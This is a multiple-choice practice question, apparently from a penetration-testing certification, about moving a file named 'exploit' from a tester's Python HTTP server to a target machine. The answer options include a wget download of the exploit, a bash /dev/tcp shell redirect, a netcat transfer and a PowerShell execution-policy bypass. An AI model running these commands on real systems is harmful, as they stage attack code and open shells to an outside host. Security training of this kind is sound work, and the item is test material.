A penetration tester ran the following command on a staging server:
python –m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
nc 10.10.51.50 9891 < exploit
powershell –exec bypass –f \\10.10.51.50\9891
bash –i >& /dev/tcp/10.10.51.50/9891 0&1>/exploit
wget 10.10.51.50:9891/exploit
Submit